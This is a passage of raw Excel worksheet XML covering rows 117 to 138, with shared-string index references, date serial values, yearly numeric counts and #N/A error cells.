        <v>100</v>
      </c>
      <c r="G117" s="1" t="s">
        <v>1366</v>
      </c>
      <c r="H117" s="1" t="s">
        <v>1367</v>
      </c>
      <c r="I117" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J117" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K117" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L117" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M117" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N117" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O117" s="1"/>
      <c r="P117" s="1"/>
      <c r="Q117" s="1" t="s">
        <v>3529</v>
      </c>
      <c r="R117" s="83">
        <v>5220</v>
      </c>
      <c r="S117" s="83">
        <v>4317</v>
      </c>
      <c r="T117" s="83">
        <v>6269</v>
      </c>
      <c r="U117" s="83">
        <v>6332</v>
      </c>
      <c r="V117" s="83">
        <v>5931</v>
      </c>
      <c r="W117" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="118" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A118" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B118" s="51">
        <v>44320.592346851852</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>1368</v>
      </c>
      <c r="D118" s="43">
        <v>111</v>
      </c>
      <c r="E118" s="1" t="s">
        <v>1369</v>
      </c>
      <c r="F118" s="26">
        <v>101</v>
      </c>
      <c r="G118" s="1" t="s">
        <v>1370</v>
      </c>
      <c r="H118" s="1" t="s">
        <v>1371</v>
      </c>
      <c r="I118" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J118" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K118" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L118" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M118" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N118" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O118" s="1" t="s">
        <v>1372</v>
      </c>
      <c r="P118" s="1"/>
      <c r="Q118" s="1" t="s">
        <v>3530</v>
      </c>
      <c r="R118" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S118" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T118" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U118" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V118" s="83">
        <v>48</v>
      </c>
      <c r="W118" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="119" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A119" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B119" s="51">
        <v>44320.592346874997</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>1368</v>
      </c>
      <c r="D119" s="43">
        <v>111</v>
      </c>
      <c r="E119" s="1" t="s">
        <v>1374</v>
      </c>
      <c r="F119" s="26">
        <v>102</v>
      </c>
      <c r="G119" s="1" t="s">
        <v>1375</v>
      </c>
      <c r="H119" s="1" t="s">
        <v>1376</v>
      </c>
      <c r="I119" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J119" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K119" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L119" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M119" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N119" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O119" s="1" t="s">
        <v>1377</v>
      </c>
      <c r="P119" s="1" t="s">
        <v>612</v>
      </c>
      <c r="Q119" s="1" t="s">
        <v>3530</v>
      </c>
      <c r="R119" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S119" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T119" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U119" s="83">
        <v>3</v>
      </c>
      <c r="V119" s="83">
        <v>37</v>
      </c>
      <c r="W119" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="120" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A120" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B120" s="51">
        <v>44655.658999687497</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>1378</v>
      </c>
      <c r="D120" s="43">
        <v>100</v>
      </c>
      <c r="E120" s="1" t="s">
        <v>1379</v>
      </c>
      <c r="F120" s="26">
        <v>100</v>
      </c>
      <c r="G120" s="1" t="s">
        <v>1380</v>
      </c>
      <c r="H120" s="1" t="s">
        <v>1381</v>
      </c>
      <c r="I120" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J120" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K120" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L120" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M120" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N120" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O120" s="1"/>
      <c r="P120" s="1"/>
      <c r="Q120" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R120" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S120" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T120" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U120" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V120" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W120" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="121" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A121" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B121" s="51">
        <v>44790.693671215275</v>
      </c>
      <c r="C121" s="1" t="s">
        <v>1382</v>
      </c>
      <c r="D121" s="26">
        <v>112</v>
      </c>
      <c r="E121" s="1" t="s">
        <v>1383</v>
      </c>
      <c r="F121" s="26">
        <v>112</v>
      </c>
      <c r="G121" s="57" t="s">
        <v>1384</v>
      </c>
      <c r="H121" s="1" t="s">
        <v>1351</v>
      </c>
      <c r="I121" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J121" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K121" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L121" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M121" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N121" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O121" s="1" t="s">
        <v>1352</v>
      </c>
      <c r="P121" s="1"/>
      <c r="Q121" s="1" t="s">
        <v>1385</v>
      </c>
      <c r="R121" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S121" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T121" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U121" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V121" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W121" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="122" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A122" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B122" s="51">
        <v>44154.744477476852</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>1386</v>
      </c>
      <c r="D122" s="43">
        <v>100</v>
      </c>
      <c r="E122" s="1" t="s">
        <v>1387</v>
      </c>
      <c r="F122" s="26">
        <v>100</v>
      </c>
      <c r="G122" s="1" t="s">
        <v>1388</v>
      </c>
      <c r="H122" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="I122" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J122" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K122" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L122" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M122" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N122" s="1"/>
      <c r="O122" s="1" t="s">
        <v>1390</v>
      </c>
      <c r="P122" s="1"/>
      <c r="Q122" s="1" t="s">
        <v>3531</v>
      </c>
      <c r="R122" s="83">
        <v>875141</v>
      </c>
      <c r="S122" s="83">
        <v>758501</v>
      </c>
      <c r="T122" s="83">
        <v>745088</v>
      </c>
      <c r="U122" s="83">
        <v>662870</v>
      </c>
      <c r="V122" s="83">
        <v>803013</v>
      </c>
      <c r="W122" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="123" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A123" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B123" s="51">
        <v>44331.307228090278</v>
      </c>
      <c r="C123" s="1" t="s">
        <v>1392</v>
      </c>
      <c r="D123" s="43">
        <v>103</v>
      </c>
      <c r="E123" s="1" t="s">
        <v>1393</v>
      </c>
      <c r="F123" s="26">
        <v>103</v>
      </c>
      <c r="G123" s="1" t="s">
        <v>1394</v>
      </c>
      <c r="H123" s="1" t="s">
        <v>1355</v>
      </c>
      <c r="I123" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J123" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K123" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L123" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M123" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N123" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O123" s="1" t="s">
        <v>1395</v>
      </c>
      <c r="P123" s="1"/>
      <c r="Q123" s="1" t="s">
        <v>3532</v>
      </c>
      <c r="R123" s="83">
        <v>2606116</v>
      </c>
      <c r="S123" s="83">
        <v>2459726</v>
      </c>
      <c r="T123" s="83">
        <v>2282047</v>
      </c>
      <c r="U123" s="83">
        <v>8581277</v>
      </c>
      <c r="V123" s="83">
        <v>9406094</v>
      </c>
      <c r="W123" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="124" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A124" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B124" s="51">
        <v>44335.522551319445</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>1397</v>
      </c>
      <c r="D124" s="43">
        <v>100</v>
      </c>
      <c r="E124" s="1" t="s">
        <v>1398</v>
      </c>
      <c r="F124" s="26">
        <v>100</v>
      </c>
      <c r="G124" s="1" t="s">
        <v>1399</v>
      </c>
      <c r="H124" s="1" t="s">
        <v>1355</v>
      </c>
      <c r="I124" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J124" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K124" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L124" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M124" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N124" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O124" s="1"/>
      <c r="P124" s="1"/>
      <c r="Q124" s="1" t="s">
        <v>1400</v>
      </c>
      <c r="R124" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S124" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T124" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U124" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V124" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W124" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="125" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A125" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B125" s="51">
        <v>43962.765995185182</v>
      </c>
      <c r="C125" s="1" t="s">
        <v>1401</v>
      </c>
      <c r="D125" s="43">
        <v>100</v>
      </c>
      <c r="E125" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="F125" s="26">
        <v>100</v>
      </c>
      <c r="G125" s="1" t="s">
        <v>1403</v>
      </c>
      <c r="H125" s="1" t="s">
        <v>1404</v>
      </c>
      <c r="I125" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J125" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K125" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L125" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M125" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N125" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O125" s="1" t="s">
        <v>1405</v>
      </c>
      <c r="P125" s="1" t="s">
        <v>960</v>
      </c>
      <c r="Q125" s="1" t="s">
        <v>1406</v>
      </c>
      <c r="R125" s="83">
        <v>60497</v>
      </c>
      <c r="S125" s="83">
        <v>46015</v>
      </c>
      <c r="T125" s="83">
        <v>45228</v>
      </c>
      <c r="U125" s="83">
        <v>44692</v>
      </c>
      <c r="V125" s="83">
        <v>37815</v>
      </c>
      <c r="W125" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="126" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A126" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B126" s="51">
        <v>44466.840868703701</v>
      </c>
      <c r="C126" s="1" t="s">
        <v>1401</v>
      </c>
      <c r="D126" s="43">
        <v>120</v>
      </c>
      <c r="E126" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="F126" s="26">
        <v>120</v>
      </c>
      <c r="G126" s="1" t="s">
        <v>1403</v>
      </c>
      <c r="H126" s="1" t="s">
        <v>1404</v>
      </c>
      <c r="I126" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J126" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K126" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L126" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M126" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N126" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O126" s="1" t="s">
        <v>1405</v>
      </c>
      <c r="P126" s="1" t="s">
        <v>960</v>
      </c>
      <c r="Q126" s="1" t="s">
        <v>3533</v>
      </c>
      <c r="R126" s="83">
        <v>60497</v>
      </c>
      <c r="S126" s="83">
        <v>46015</v>
      </c>
      <c r="T126" s="83">
        <v>45228</v>
      </c>
      <c r="U126" s="83">
        <v>44692</v>
      </c>
      <c r="V126" s="83">
        <v>37815</v>
      </c>
      <c r="W126" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="127" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A127" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B127" s="51">
        <v>44377.710028506946</v>
      </c>
      <c r="C127" s="1" t="s">
        <v>1422</v>
      </c>
      <c r="D127" s="43">
        <v>100</v>
      </c>
      <c r="E127" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="F127" s="26">
        <v>100</v>
      </c>
      <c r="G127" s="1" t="s">
        <v>1424</v>
      </c>
      <c r="H127" s="1" t="s">
        <v>1425</v>
      </c>
      <c r="I127" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J127" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K127" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L127" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M127" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N127" s="1" t="s">
        <v>174</v>
      </c>
      <c r="O127" s="1"/>
      <c r="P127" s="1"/>
      <c r="Q127" s="1" t="s">
        <v>151</v>
      </c>
      <c r="R127" s="83">
        <v>1</v>
      </c>
      <c r="S127" s="83">
        <v>23</v>
      </c>
      <c r="T127" s="83">
        <v>736</v>
      </c>
      <c r="U127" s="83">
        <v>13533</v>
      </c>
      <c r="V127" s="83">
        <v>60179</v>
      </c>
      <c r="W127" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="128" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A128" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B128" s="51">
        <v>44377.710028530091</v>
      </c>
      <c r="C128" s="1" t="s">
        <v>1422</v>
      </c>
      <c r="D128" s="43">
        <v>100</v>
      </c>
      <c r="E128" s="1" t="s">
        <v>1426</v>
      </c>
      <c r="F128" s="26">
        <v>100</v>
      </c>
      <c r="G128" s="1" t="s">
        <v>1427</v>
      </c>
      <c r="H128" s="1" t="s">
        <v>1428</v>
      </c>
      <c r="I128" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J128" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K128" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L128" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M128" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N128" s="1" t="s">
        <v>174</v>
      </c>
      <c r="O128" s="1"/>
      <c r="P128" s="1"/>
      <c r="Q128" s="1" t="s">
        <v>151</v>
      </c>
      <c r="R128" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S128" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T128" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U128" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V128" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W128" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="129" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A129" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B129" s="51">
        <v>44223.633561516202</v>
      </c>
      <c r="C129" s="1" t="s">
        <v>1429</v>
      </c>
      <c r="D129" s="43">
        <v>103</v>
      </c>
      <c r="E129" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="F129" s="26">
        <v>103</v>
      </c>
      <c r="G129" s="1" t="s">
        <v>1431</v>
      </c>
      <c r="H129" s="1" t="s">
        <v>1432</v>
      </c>
      <c r="I129" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J129" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K129" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L129" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M129" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N129" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O129" s="1"/>
      <c r="P129" s="1"/>
      <c r="Q129" s="1" t="s">
        <v>3534</v>
      </c>
      <c r="R129" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S129" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T129" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U129" s="83">
        <v>2</v>
      </c>
      <c r="V129" s="83">
        <v>2</v>
      </c>
      <c r="W129" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="130" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A130" s="49" t="s">
        <v>4</v>
      </c>
      <c r="B130" s="51">
        <v>44534.414179247688</v>
      </c>
      <c r="C130" s="49" t="s">
        <v>1434</v>
      </c>
      <c r="D130" s="60">
        <v>100</v>
      </c>
      <c r="E130" s="49" t="s">
        <v>1435</v>
      </c>
      <c r="F130" s="60">
        <v>100</v>
      </c>
      <c r="G130" s="49" t="s">
        <v>1436</v>
      </c>
      <c r="H130" s="49" t="s">
        <v>1437</v>
      </c>
      <c r="I130" s="49" t="s">
        <v>268</v>
      </c>
      <c r="J130" s="49" t="s">
        <v>566</v>
      </c>
      <c r="K130" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L130" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M130" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N130" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O130" s="49"/>
      <c r="P130" s="49"/>
      <c r="Q130" s="1" t="s">
        <v>3535</v>
      </c>
      <c r="R130" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S130" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T130" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U130" s="84" t="e">
        <v>#N/A</v>
      </c>
      <c r="V130" s="84">
        <v>2</v>
      </c>
      <c r="W130" s="49" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="131" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A131" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B131" s="51">
        <v>44165.384758321758</v>
      </c>
      <c r="C131" s="1" t="s">
        <v>1439</v>
      </c>
      <c r="D131" s="43">
        <v>102</v>
      </c>
      <c r="E131" s="1" t="s">
        <v>1440</v>
      </c>
      <c r="F131" s="26">
        <v>102</v>
      </c>
      <c r="G131" s="1" t="s">
        <v>1441</v>
      </c>
      <c r="H131" s="1" t="s">
        <v>1442</v>
      </c>
      <c r="I131" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J131" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K131" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L131" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M131" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N131" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O131" s="1" t="s">
        <v>1443</v>
      </c>
      <c r="P131" s="1" t="s">
        <v>738</v>
      </c>
      <c r="Q131" s="1" t="s">
        <v>3536</v>
      </c>
      <c r="R131" s="83">
        <v>45035</v>
      </c>
      <c r="S131" s="83">
        <v>40844</v>
      </c>
      <c r="T131" s="83">
        <v>43006</v>
      </c>
      <c r="U131" s="83">
        <v>213670</v>
      </c>
      <c r="V131" s="83">
        <v>575549</v>
      </c>
      <c r="W131" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="132" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A132" s="3" t="s">
        <v>4</v>
      </c>
      <c r="B132" s="51">
        <v>44580.691867928239</v>
      </c>
      <c r="C132" s="3" t="s">
        <v>1445</v>
      </c>
      <c r="D132" s="78">
        <v>101</v>
      </c>
      <c r="E132" s="3" t="s">
        <v>1446</v>
      </c>
      <c r="F132" s="79">
        <v>101</v>
      </c>
      <c r="G132" s="3" t="s">
        <v>1447</v>
      </c>
      <c r="H132" s="3" t="s">
        <v>1448</v>
      </c>
      <c r="I132" s="3" t="s">
        <v>611</v>
      </c>
      <c r="J132" s="3" t="s">
        <v>612</v>
      </c>
      <c r="K132" s="17" t="s">
        <v>14</v>
      </c>
      <c r="L132" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M132" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N132" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O132" s="3" t="s">
        <v>1449</v>
      </c>
      <c r="P132" s="3"/>
      <c r="Q132" s="3" t="s">
        <v>3537</v>
      </c>
      <c r="R132" s="85">
        <v>234</v>
      </c>
      <c r="S132" s="83">
        <v>2780</v>
      </c>
      <c r="T132" s="83">
        <v>271</v>
      </c>
      <c r="U132" s="85">
        <v>1164</v>
      </c>
      <c r="V132" s="85">
        <v>867</v>
      </c>
      <c r="W132" s="3" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="133" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A133" s="3" t="s">
        <v>4</v>
      </c>
      <c r="B133" s="51">
        <v>44342.648591805555</v>
      </c>
      <c r="C133" s="1" t="s">
        <v>1451</v>
      </c>
      <c r="D133" s="26">
        <v>103</v>
      </c>
      <c r="E133" s="1" t="s">
        <v>1452</v>
      </c>
      <c r="F133" s="26">
        <v>103</v>
      </c>
      <c r="G133" s="1" t="s">
        <v>1453</v>
      </c>
      <c r="H133" s="1" t="s">
        <v>1454</v>
      </c>
      <c r="I133" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J133" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K133" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L133" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M133" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N133" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O133" s="1"/>
      <c r="P133" s="1"/>
      <c r="Q133" s="1" t="s">
        <v>3538</v>
      </c>
      <c r="R133" s="83">
        <v>9330</v>
      </c>
      <c r="S133" s="83">
        <v>16286</v>
      </c>
      <c r="T133" s="83">
        <v>18003</v>
      </c>
      <c r="U133" s="85">
        <v>22346</v>
      </c>
      <c r="V133" s="85">
        <v>52757</v>
      </c>
      <c r="W133" s="3" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="134" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A134" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B134" s="51">
        <v>44069.67221527778</v>
      </c>
      <c r="C134" s="1" t="s">
        <v>1451</v>
      </c>
      <c r="D134" s="43">
        <v>205</v>
      </c>
      <c r="E134" s="1" t="s">
        <v>1452</v>
      </c>
      <c r="F134" s="26">
        <v>205</v>
      </c>
      <c r="G134" s="1" t="s">
        <v>1453</v>
      </c>
      <c r="H134" s="1" t="s">
        <v>1454</v>
      </c>
      <c r="I134" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J134" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K134" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L134" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M134" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N134" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O134" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P134" s="1"/>
      <c r="Q134" s="1" t="s">
        <v>3539</v>
      </c>
      <c r="R134" s="83">
        <v>9330</v>
      </c>
      <c r="S134" s="83">
        <v>16286</v>
      </c>
      <c r="T134" s="83">
        <v>18003</v>
      </c>
      <c r="U134" s="83">
        <v>22346</v>
      </c>
      <c r="V134" s="83">
        <v>52757</v>
      </c>
      <c r="W134" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="135" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A135" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B135" s="51">
        <v>44245.657708993058</v>
      </c>
      <c r="C135" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="D135" s="43">
        <v>103</v>
      </c>
      <c r="E135" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="F135" s="26">
        <v>101</v>
      </c>
      <c r="G135" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="H135" s="1" t="s">
        <v>1460</v>
      </c>
      <c r="I135" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J135" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K135" s="1" t="s">
        <v>40</v>
      </c>
      <c r="L135" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M135" s="1"/>
      <c r="N135" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="O135" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P135" s="1"/>
      <c r="Q135" s="1" t="s">
        <v>3540</v>
      </c>
      <c r="R135" s="83">
        <v>391</v>
      </c>
      <c r="S135" s="83">
        <v>114</v>
      </c>
      <c r="T135" s="83">
        <v>91</v>
      </c>
      <c r="U135" s="83">
        <v>1588</v>
      </c>
      <c r="V135" s="83">
        <v>1722</v>
      </c>
      <c r="W135" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="136" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A136" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B136" s="51">
        <v>44113.635730624999</v>
      </c>
      <c r="C136" s="1" t="s">
        <v>1463</v>
      </c>
      <c r="D136" s="43">
        <v>200</v>
      </c>
      <c r="E136" s="1" t="s">
        <v>1458</v>
      </c>
      <c r="F136" s="26">
        <v>200</v>
      </c>
      <c r="G136" s="1" t="s">
        <v>1459</v>
      </c>
      <c r="H136" s="1" t="s">
        <v>1460</v>
      </c>
      <c r="I136" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J136" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K136" s="1" t="s">
        <v>40</v>
      </c>
      <c r="L136" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M136" s="1"/>
      <c r="N136" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="O136" s="1" t="s">
        <v>1461</v>
      </c>
      <c r="P136" s="1"/>
      <c r="Q136" s="1" t="s">
        <v>3541</v>
      </c>
      <c r="R136" s="83">
        <v>391</v>
      </c>
      <c r="S136" s="83">
        <v>114</v>
      </c>
      <c r="T136" s="83">
        <v>91</v>
      </c>
      <c r="U136" s="83">
        <v>1588</v>
      </c>
      <c r="V136" s="83">
        <v>1722</v>
      </c>
      <c r="W136" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="137" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A137" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B137" s="51">
        <v>44335.700018090276</v>
      </c>
      <c r="C137" s="1" t="s">
        <v>1465</v>
      </c>
      <c r="D137" s="43">
        <v>101</v>
      </c>
      <c r="E137" s="1" t="s">
        <v>1466</v>
      </c>
      <c r="F137" s="26">
        <v>101</v>
      </c>
      <c r="G137" s="1" t="s">
        <v>1467</v>
      </c>
      <c r="H137" s="1" t="s">
        <v>1468</v>
      </c>
      <c r="I137" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J137" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K137" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L137" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M137" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N137" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O137" s="1"/>
      <c r="P137" s="1"/>
      <c r="Q137" s="1" t="s">
        <v>3542</v>
      </c>
      <c r="R137" s="83">
        <v>46259</v>
      </c>
      <c r="S137" s="83">
        <v>43849</v>
      </c>
      <c r="T137" s="83">
        <v>37500</v>
      </c>
      <c r="U137" s="83">
        <v>36910</v>
      </c>
      <c r="V137" s="83">
        <v>48779</v>
      </c>
      <c r="W137" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="138" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A138" s="1" t="s">
        <v>4</v>
      </c>
